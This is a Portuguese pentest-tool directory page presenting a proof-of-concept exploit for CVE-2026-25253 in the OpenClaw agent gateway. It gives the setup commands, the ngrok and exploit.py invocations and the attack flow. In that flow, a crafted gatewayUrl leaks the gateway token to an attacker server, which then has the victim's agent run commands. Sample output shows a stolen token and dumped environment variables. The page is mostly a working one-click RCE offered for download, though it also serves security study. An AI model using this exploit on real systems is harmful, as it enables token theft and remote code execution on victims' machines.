Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/yym8538/cve-2026-25253
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosSegurança WebTestes de PenetraçãoAutenticaçãoRed TeamingFerramenta de Acesso Remoto
GitHubyym8538/cve-2026-25253

CVE-2026-25253

Proof-of-concept de exploit para CVE-2026-25253 no OpenClaw: um gatewayUrl manipulado exfiltra o token de gateway da Control UI, permitindo acesso não autorizado ao gateway e execução remota de código com 1 clique.

Ver Repositório
1há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-25253 OpenClaw RCE de 1 Clique

★ CVE-2026-25253 OpenClaw Execução Remota de Código de 1 Clique PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Descrição

CVE-2026-25253 : Vulnerabilidade de Exfiltração de Token de Autenticação do OpenClaw

descrição: OpenClaw (também conhecido como clawdbot ou Moltbot) anterior à v2026.1.29 permite que atacantes exfiltrem um token de autenticação de gateway armazenado ao fornecer um valor de query-string gatewayUrl manipulado para a Control UI, que estabelece automaticamente uma conexão WebSocket sem validação ou confirmação do usuário. Isso pode levar a acesso não autorizado ao gateway e execução remota de código com 1 clique.

Requisitos

  • Docker (Docker Desktop no Windows)
  • Python 3.x (lado do ataque)

Arquivos

  • Dockerfile — constrói o ambiente vulnerável do OpenClaw
  • templates/ — páginas web maliciosas usadas pelo exploit
  • config.txt — configuração do OpenClaw usada no ambiente da vítima
  • exploit.py — servidor de exploit
  • requirements.txt — dependências do PoC

Configuração do Ambiente

  1. Construir a imagem Docker
docker build -t openclaw-vuln .
  1. Executar o ambiente (Windows)
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. Criar túnel SSH
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • Senha: openclawlab
  1. Acessar a Control UI do OpenClaw Abra a seguinte URL no navegador
http://127.0.0.1:18789/
  1. Insira o Gateway Token d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. Clique em Connect
  3. Abra a aba Config
  4. cole o conteúdo de config.txt
  5. Substitua o campo da chave de API pela sua chave de API da OpenAI
  6. Salve a configuração
  7. Confirme que o agente responde normalmente

Prova de Conceito (PoC)

  1. Instalar dependências (lado do ataque)
pip3 install -r requirements.txt
  1. Expor o servidor de exploit via HTTPS
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • Copie o hostname de encaminhamento gerado
  1. Executar o servidor de exploit
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

Exemplo:

python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. Acionar o ataque
  1. Abra a página maliciosa exposta pelo servidor de exploit
  2. Simule a interação da vítima com a página
  3. Acione o fluxo do exploit a partir do navegador

Fluxo do Ataque

  1. Uma URL maliciosa altera o gatewayUrl da Control UI da vítima
  2. O navegador se conecta automaticamente ao endpoint WebSocket controlado pelo atacante
  3. O token de autenticação do gateway é vazado para o atacante
  4. A página maliciosa usa o token roubado para abrir uma nova conexão WebSocket com o gateway OpenClaw local da vítima
  5. Uma solicitação de execução de comando é enviada através do agente
  6. O resultado da execução é retornado ao servidor do atacante

Resultado Esperado

  • O navegador da vítima é redirecionado para o fluxo WebSocket malicioso
  • O token de autenticação do gateway é capturado pelo atacante
  • O atacante pode enviar uma solicitação de execução de comando através do OpenClaw
  • A saída do comando é retornada ao servidor do atacante

Exemplo de Saída

[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

Notas

  • Este PoC tem como alvo o OpenClaw 2026.1.24-1
  • A cadeia de exploit depende do tratamento vulnerável do gatewayUrl na Control UI
  • Para acesso remoto à vítima, a página maliciosa deve ser servida via HTTPS
  • O gateway OpenClaw local é alcançado através do navegador da vítima como uma ponte

EQST Insight

Publicamos análises de CVE e malware uma vez por mês. Se você estiver interessado, por favor siga os links abaixo para conferir nossas publicações.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
Baixar ferramenta